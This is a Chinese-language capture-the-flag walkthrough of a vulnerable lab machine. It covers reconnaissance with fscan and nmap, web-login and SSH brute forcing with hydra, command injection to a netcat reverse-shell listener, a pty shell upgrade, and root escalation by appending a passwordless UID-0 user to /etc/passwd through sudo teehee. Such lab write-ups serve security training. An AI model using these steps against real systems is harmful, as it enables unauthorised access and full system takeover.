信息收集
fscan扫描存活主机
PS C:\Users\lenovo\Desktop\HackTool> .\fscan64.exe -h 192.168.1.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 192.168.1.53 is alive
(icmp) Target 192.168.1.108 is alive
(icmp) Target 192.168.1.1 is alive
(icmp) Target 192.168.1.104 is alive
(icmp) Target 192.168.1.105 is alive
(icmp) Target 192.168.1.109 is alive
[*] Icmp alive hosts len is: 6
确定目标主机是192.168.1.105
namp扫描端口
nmap -A 192.168.1.105 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-20 10:11 CST
Nmap scan report for 192.168.1.105
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
zsh: segmentation fault nmap -A 192.168.1.105 -p-
开放了22和80端口,直接访问web服务
就一个登录框
暴力破解
直接爆破密码
爆出密码是happy
命令执行
登进去一看是命令执行漏洞
抓包修改参数,查看用户
查看到有三个用户,charles、jim、sam
nc反弹shell
nc -lvp 9999
python切换shell
python3 -c "import pty;pty.spawn('/bin/bash')"
在/home/jim目录下发现文件old-passwords.bak文件,查看,可以作为爆破ssh的密码字典
复制保存到kali
爆破ssh
└─$ sudo hydra -l jim -P pass.txt ssh://192.168.1.105
最后密码是jibril04
登录提示you have mail
存在Charles的密码Password is: ^xHhA&hvim0y
切换用户
su charles
sudo提权
sudo -l
有最追加写入文件功能的时候,直接往 /etc/passwd 里加个root用户
teehee提权
passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]
echo "yesir::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
flag
他帮你驱散黑暗,我却带给你光明。可,你心里没有我